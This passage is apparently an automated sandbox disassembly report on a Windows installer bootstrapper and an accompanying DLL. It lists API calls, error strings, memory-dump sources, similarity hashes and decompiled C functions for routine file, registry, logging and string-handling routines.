                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(000000F8,000000F8,00000001,00000000,?,00402308,000000F8,000000F8,000002A8,00000000,00000001,000000F8), ref: 00403B74
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get value as string for variable: %ls, xrefs: 00403B63
                                                                                                                                                                  • Failed to get variable: %ls, xrefs: 00403B0D
                                                                                                                                                                  • Failed to format value '%ls' of variable: %ls, xrefs: 00403B3E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to format value '%ls' of variable: %ls$Failed to get value as string for variable: %ls$Failed to get variable: %ls
                                                                                                                                                                  • API String ID: 3168844106-1273532094
                                                                                                                                                                  • Opcode ID: 3e05dae4056529436b85fd7dc5c19cf0bbe4f7640864a9c8f188c2b7a516e629
                                                                                                                                                                  • Instruction ID: e4550130b19b702e804d4c3dd7b3e9640169f4b7be7a9b76d97ada3842389fc7
                                                                                                                                                                  • Opcode Fuzzy Hash: 3e05dae4056529436b85fd7dc5c19cf0bbe4f7640864a9c8f188c2b7a516e629
                                                                                                                                                                  • Instruction Fuzzy Hash: 84117F36900215FBCF111E55CC05F9A7E39FB0471AF104126F914751A1D379AB60ABD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • _malloc.LIBCMT ref: 0042E5F9
                                                                                                                                                                    • Part of subcall function 0042BBE1: __FF_MSGBANNER.LIBCMT ref: 0042BBF8
                                                                                                                                                                    • Part of subcall function 0042BBE1: __NMSG_WRITE.LIBCMT ref: 0042BBFF
                                                                                                                                                                    • Part of subcall function 0042BBE1: HeapAlloc.KERNEL32(?,00000000,00000001,?,00000000,00000000,?,0042C16B,00000000,00000000,00000000,00000000,?,0042C05B,00000018,00454160), ref: 0042BC24
                                                                                                                                                                  • _free.LIBCMT ref: 0042E60C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocHeap_free_malloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2734353464-0
                                                                                                                                                                  • Opcode ID: 2b8b9a0b149064b7c10ffa9c32ed741fc56f4de5a02850290b0b915e6c568d63
                                                                                                                                                                  • Instruction ID: 6840f4d756b0eee8bd0161fd79570ac2f6643b718815756135da4e1fa473277d
                                                                                                                                                                  • Opcode Fuzzy Hash: 2b8b9a0b149064b7c10ffa9c32ed741fc56f4de5a02850290b0b915e6c568d63
                                                                                                                                                                  • Instruction Fuzzy Hash: AF11C132714231ABCB212F76BC45B9A3B859B203A5BD0452BF9099E261DB3D885086DD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E10019390(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                  				void* _t17;
                                                                                                                                                                  				void* _t18;
                                                                                                                                                                  				void* _t19;
                                                                                                                                                                  				void* _t21;
                                                                                                                                                                  				void* _t25;
                                                                                                                                                                  				void* _t30;
                                                                                                                                                                  				void* _t38;
                                                                                                                                                                  				void* _t42;
                                                                                                                                                                  				void* _t44;
                                                                                                                                                                  				void* _t46;
                                                                                                                                                                  
                                                                                                                                                                  				_t38 = __edi;
                                                                                                                                                                  				_t30 = __ebx;
                                                                                                                                                                  				_t17 = E1000CAD0(_a4);
                                                                                                                                                                  				_t18 = E1000CAD0(_a8);
                                                                                                                                                                  				_t44 = _t42 + 8;
                                                                                                                                                                  				if(_t17 >= _t18) {
                                                                                                                                                                  					_v8 = _a4;
                                                                                                                                                                  					_v12 = 0;
                                                                                                                                                                  					while(1) {
                                                                                                                                                                  						_t19 = E1000CAD0(_a8);
                                                                                                                                                                  						_t21 = E1000CAD0(_a4);
                                                                                                                                                                  						_t46 = _t44 + 8;
                                                                                                                                                                  						if(_t19 + _v12 > _t21) {
                                                                                                                                                                  							break;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t25 = E1000E8FF(_t30, _a8, _t38, _v8, _a8, E1000CAD0(_a8));
                                                                                                                                                                  						_t44 = _t46 + 0x10;
                                                                                                                                                                  						if(_t25 != 0) {
                                                                                                                                                                  							_v12 = _v12 + 1;
                                                                                                                                                                  							_v8 = _v8 + 1;
                                                                                                                                                                  							continue;
                                                                                                                                                                  						}
                                                                                                                                                                  						return 1;
                                                                                                                                                                  					}
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				}
                                                                                                                                                                  				return 0;
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _strlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4218353326-0
                                                                                                                                                                  • Opcode ID: e838c8b0435b565fb9a53166a5dd30e01c929ba7b477388d88b0234cdaad13b2
                                                                                                                                                                  • Instruction ID: bf7a77dd80a6ed25a2450b96e81a1ff586a3e69a3a9db53e8abd92bbbbbe0b29
                                                                                                                                                                  • Opcode Fuzzy Hash: e838c8b0435b565fb9a53166a5dd30e01c929ba7b477388d88b0234cdaad13b2
                                                                                                                                                                  • Instruction Fuzzy Hash: DA113BB9E0020CA7EB10DFA8E841D9D77A4EB04294F148165FD0BDB305E531FE519792
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E10019730(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                  				void* _t20;
                                                                                                                                                                  				void* _t21;
                                                                                                                                                                  				void* _t23;
                                                                                                                                                                  				void* _t24;
                                                                                                                                                                  				void* _t27;
                                                                                                                                                                  				void* _t28;
                                                                                                                                                                  				void* _t36;
                                                                                                                                                                  				void* _t40;
                                                                                                                                                                  				void* _t42;
                                                                                                                                                                  				void* _t44;
                                                                                                                                                                  
                                                                                                                                                                  				_t36 = __edi;
                                                                                                                                                                  				_t28 = __ebx;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				if(_a4 != 0 && _a8 != 0) {
                                                                                                                                                                  					_t20 = E1000CAD0(_a4);
                                                                                                                                                                  					_t21 = E1000CAD0(_a8);
                                                                                                                                                                  					_t42 = _t40 + 8;
                                                                                                                                                                  					if(_t20 >= _t21) {
                                                                                                                                                                  						_v12 = 0;
                                                                                                                                                                  						while(1) {
                                                                                                                                                                  							_t23 = E1000CAD0(_a4);
                                                                                                                                                                  							_t24 = E1000CAD0(_a8);
                                                                                                                                                                  							_t44 = _t42 + 8;
                                                                                                                                                                  							if(_v12 >= _t23 - _t24) {
                                                                                                                                                                  								goto L9;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t27 = E1000E8FF(_t28, _a8, _t36, _a4 + _v12, _a8, E1000CAD0(_a8));
                                                                                                                                                                  							_t42 = _t44 + 0x10;
                                                                                                                                                                  							if(_t27 != 0) {
                                                                                                                                                                  								_v12 = _v12 + 1;
                                                                                                                                                                  								continue;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_v8 = 1;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L9;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				L9:
                                                                                                                                                                  				return _v8;
                                                                                                                                                                  			}
















                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _strlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4218353326-0
                                                                                                                                                                  • Opcode ID: 0dbfc59573e71ac4ac271f730958a2ed3158fc847fef0a7d16788525cec2ac39
                                                                                                                                                                  • Instruction ID: 99576d049c222a76ac79d86fac94021c753d4d4845e8680ecbc727badbbf4d85
                                                                                                                                                                  • Opcode Fuzzy Hash: 0dbfc59573e71ac4ac271f730958a2ed3158fc847fef0a7d16788525cec2ac39
                                                                                                                                                                  • Instruction Fuzzy Hash: 8511A7B9D1420CABEB10CFA4D845B9E77E4EF042A8F008165FC0B9B641E635EA94C782
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,?,00000000,?,00424926,00000000), ref: 00424949
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,00424926,00000000), ref: 00424955
                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,?,00000000,?,00424926,00000000), ref: 00424962
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,00424926,00000000), ref: 0042496F
                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(?,00000000,?,00424926,00000000), ref: 0042497E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$FileUnmapView
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 260491571-0
                                                                                                                                                                  • Opcode ID: dea536cc78a68ed4662c43d112e302ac2b18208931349bf8c240dcb4617dd70d
                                                                                                                                                                  • Instruction ID: ee18a24e31947c009ffcfd05c3693c858a87eff4a3d0d5afeafab75f541824e8
                                                                                                                                                                  • Opcode Fuzzy Hash: dea536cc78a68ed4662c43d112e302ac2b18208931349bf8c240dcb4617dd70d
                                                                                                                                                                  • Instruction Fuzzy Hash: 3C01FB76500B25DFCB305F66E880817F7E9FF90715355893FD2A652A20C775A880CF84
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                  			E1000EAC5(void* __ebx, void* __edi) {
                                                                                                                                                                  
                                                                                                                                                                  				E100115F6();
                                                                                                                                                                  				if(E10014911(1, 0x214) != __edi) {
                                                                                                                                                                  					_push(__esi);
                                                                                                                                                                  					_push( *0x10334590);
                                                                                                                                                                  					__eax = E1001158A( *0x10335480);
                                                                                                                                                                  					__eflags = __eax;
                                                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                                                  						_push(__esi);
                                                                                                                                                                  						__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
                                                                                                                                                                  						goto L1;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push(__edi);
                                                                                                                                                                  						_push(__esi);
                                                                                                                                                                  						__eax = E1001165D(__ebx, __edi, __esi, __eflags);
                                                                                                                                                                  						__eax = GetCurrentThreadId();
                                                                                                                                                                  						__esi[1] = __esi[1] | 0xffffffff;
                                                                                                                                                                  						 *__esi = __eax;
                                                                                                                                                                  						0 = 1;
                                                                                                                                                                  						__eflags = 1;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return 0;
                                                                                                                                                                  			}




                                                                                                                                                                  APIs
                                                                                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 1000EAC5
                                                                                                                                                                    • Part of subcall function 100115F6: TlsGetValue.KERNEL32(10011720), ref: 100115FC
                                                                                                                                                                    • Part of subcall function 100115F6: __decode_pointer.LIBCMT ref: 1001160C
                                                                                                                                                                    • Part of subcall function 100115F6: TlsSetValue.KERNEL32(00000000), ref: 10011619
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 1000EAD1
                                                                                                                                                                    • Part of subcall function 10014911: __calloc_impl.LIBCMT ref: 1001491F
                                                                                                                                                                    • Part of subcall function 10014911: Sleep.KERNEL32(00000000,10011746,00000001,00000214), ref: 10014936
                                                                                                                                                                  • __decode_pointer.LIBCMT ref: 1000EAEF
                                                                                                                                                                    • Part of subcall function 1001158A: TlsGetValue.KERNEL32(?,10011918,00000000,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001,?,?,10331550), ref: 10011597
                                                                                                                                                                    • Part of subcall function 1001158A: TlsGetValue.KERNEL32(00000005,?,10011918,00000000,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001), ref: 100115AE
                                                                                                                                                                  • __initptd.LIBCMT ref: 1000EAFD
                                                                                                                                                                    • Part of subcall function 1001165D: GetModuleHandleA.KERNEL32(KERNEL32.DLL,103315D0,0000000C,1001176F,00000000,00000000), ref: 1001166E
                                                                                                                                                                    • Part of subcall function 1001165D: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10011697
                                                                                                                                                                    • Part of subcall function 1001165D: GetProcAddress.KERNEL32(?,DecodePointer), ref: 100116A7
                                                                                                                                                                    • Part of subcall function 1001165D: InterlockedIncrement.KERNEL32(10334658), ref: 100116C9
                                                                                                                                                                    • Part of subcall function 1001165D: ___addlocaleref.LIBCMT ref: 100116F0
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 1000EB04
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$AddressProc__decode_pointer$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref___set_flsgetvalue__calloc_crt__calloc_impl__initptd
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1662683381-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: #115#116
                                                                                                                                                                  • String ID: $wiutil.cpp
                                                                                                                                                                  • API String ID: 618785432-1260143216
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,0000001C,00000000,?,00000000,?,0041D735,000003BC,00000001,00401414,000000F8), ref: 0041CC53
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed grow array of ordered patches., xrefs: 0041CD62
                                                                                                                                                                  • Failed to copy target product code., xrefs: 0041CD14
                                                                                                                                                                  • Failed to plan action for target product., xrefs: 0041CC9A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to plan action for target product.
                                                                                                                                                                  • API String ID: 1825529933-2271831357
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00436AF7: FindFirstFileW.KERNEL32(00000000,?,0000001C,00000000,00000000), ref: 00436B32
                                                                                                                                                                    • Part of subcall function 00436AF7: FindClose.KERNEL32(00000000), ref: 00436B3E
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,000003BC,00000000,00000000,00000000,000003D8,000000F8), ref: 00436AE9
                                                                                                                                                                  Strings
                                                                                                                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00436A28
                                                                                                                                                                  • PendingFileRenameOperations, xrefs: 00436A54
                                                                                                                                                                  • \, xrefs: 00436A72
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseFind$FileFirst
                                                                                                                                                                  • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\
                                                                                                                                                                  • API String ID: 1228951600-2982801162
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,?,000000FF,00000030,00000000,00000030,00402EC5,00402EC5,?,0040203E,00000030,?,00000000), ref: 004020DF
                                                                                                                                                                  • GetLastError.KERNEL32(?,0040203E,00000030,?,00000000,00000000,00000007,00402EC5,?,00404461,?,?,?,00000030), ref: 00402108
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareErrorLastString
                                                                                                                                                                  • String ID: Failed to compare strings.$variable.cpp
                                                                                                                                                                  • API String ID: 1733990998-1686915864
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,000003D8,00000000,000000F8,000002A8,00020019,00000000,000000F8,00000000,?,?,?,0041FA2A,00000000,00000000), ref: 0041F7AB
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to initialize package from related bundle id: %ls, xrefs: 0041F788
                                                                                                                                                                  • Failed to ensure there is space for related bundles., xrefs: 0041F753
                                                                                                                                                                  • Failed to open uninstall key for potential related bundle: %ls, xrefs: 0041F718
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
                                                                                                                                                                  • API String ID: 3535843008-1717420724
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenA.KERNEL32(004079F6,00000000,00000000,00000000,?,?,0043083A,004079F6,004079F6,00000000,00000000,0000FDE9), ref: 00430F78
                                                                                                                                                                  • WriteFile.KERNEL32(FFFFFFFF,00000000,00000000,00000000,00000000,?,?,0043083A,004079F6,004079F6,00000000,00000000,0000FDE9), ref: 00430FB4
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0043083A,004079F6,004079F6,00000000,00000000,0000FDE9), ref: 00430FBE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastWritelstrlen
                                                                                                                                                                  • String ID: logutil.cpp
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • FormatMessageW.KERNEL32(00000900,0043B580,00000000,00000000,00000000,00000000,?,00000000,?,?,00430D04,?,00000000,0043B580,?,00000001), ref: 00430670
                                                                                                                                                                  • GetLastError.KERNEL32(?,00430D04,?,00000000,0043B580,?,00000001,?,00402017,?,0043B580,00000000,?,?,00401DB6,00000002), ref: 0043067C
                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,00430D04,?,00000000,0043B580,?,00000001,?,00402017,?,0043B580), ref: 004306E4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                  • String ID: logutil.cpp
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00423D9D: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?,00000000,?,004233F8,?,?,?), ref: 00423DC5
                                                                                                                                                                    • Part of subcall function 00423D9D: GetLastError.KERNEL32(?,004233F8,?,?,?), ref: 00423DCF
                                                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 00423406
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00423410
                                                                                                                                                                  Strings
                                                                                                                                                                  • cabextract.cpp, xrefs: 00423434
                                                                                                                                                                  • Failed to read during cabinet extraction., xrefs: 0042343E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLast$PointerRead
                                                                                                                                                                  • String ID: Failed to read during cabinet extraction.$cabextract.cpp
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(0040A33A,40000000,00000001,00000000,00000002,?,00000000,000000B8,00000000,?,0040A33A,?,00000080,?,00000000), ref: 00437334
                                                                                                                                                                  • GetLastError.KERNEL32(?,0040A33A,?,00000080,?,00000000,?,?,?,?,?,00000001,000000B8,00000000,00000001), ref: 00437341
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,?,?,0040A33A,?,00000080,?,00000000,?,?,?,?,?,00000001), ref: 00437395
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000000F8,00000000,?,0041F84D,00000000,000003D8,000000F8,BundleCachePath,00000000), ref: 0043704E
                                                                                                                                                                  • GetLastError.KERNEL32(?,0041F84D,00000000,000003D8,000000F8,BundleCachePath,00000000,000000F8,BundleVersion,00000090,000000F8,EngineVersion,000000F8,00000088), ref: 0043705B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateErrorFileLast
                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00401C5F,?,00000000,?,?,00401C5F), ref: 0040105B
                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00401D2F,?,?,00401C5F), ref: 00401064
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,004020E3,004020CB,?,?,00401C5F), ref: 00401082
                                                                                                                                                                    • Part of subcall function 00431E0F: OpenProcessToken.ADVAPI32(00401C5F,00000008,00000000,00401C5F,77A19EB0,?,00401C5F), ref: 00431E2D
                                                                                                                                                                    • Part of subcall function 00431E0F: GetLastError.KERNEL32(?,00401C5F), ref: 00431E37
                                                                                                                                                                    • Part of subcall function 00431E0F: CloseHandle.KERNEL32(00000000,?,00401C5F), ref: 00431EC0
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to initialize engine section., xrefs: 004010AD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalInitializeProcessSection$CloseCurrentErrorHandleLastOpenToken
                                                                                                                                                                  • String ID: Failed to initialize engine section.
                                                                                                                                                                  • API String ID: 2976607596-2559398028
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?,00000000,?,004233F8,?,?,?), ref: 00423DC5
                                                                                                                                                                  • GetLastError.KERNEL32(?,004233F8,?,?,?), ref: 00423DCF
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to move to virtual file pointer., xrefs: 00423DFD
                                                                                                                                                                  • cabextract.cpp, xrefs: 00423DF3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                  • String ID: Failed to move to virtual file pointer.$cabextract.cpp
                                                                                                                                                                  • API String ID: 2976181284-3005670968
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(r@,?,00000104,?,00000104,?,00000000,00401C5F,?,004072ED,?,00000000,?,?,?,00401C5F), ref: 00431C3A
                                                                                                                                                                  • GetLastError.KERNEL32(?,004072ED,?,00000000,?,?,?,00401C5F,77A19EB0,00000000), ref: 00431C51
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastModuleName
                                                                                                                                                                  • String ID: pathutil.cpp$r@
                                                                                                                                                                  • API String ID: 2776309574-2262669586
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to post elevate message., xrefs: 00417B1E
                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 00417B14
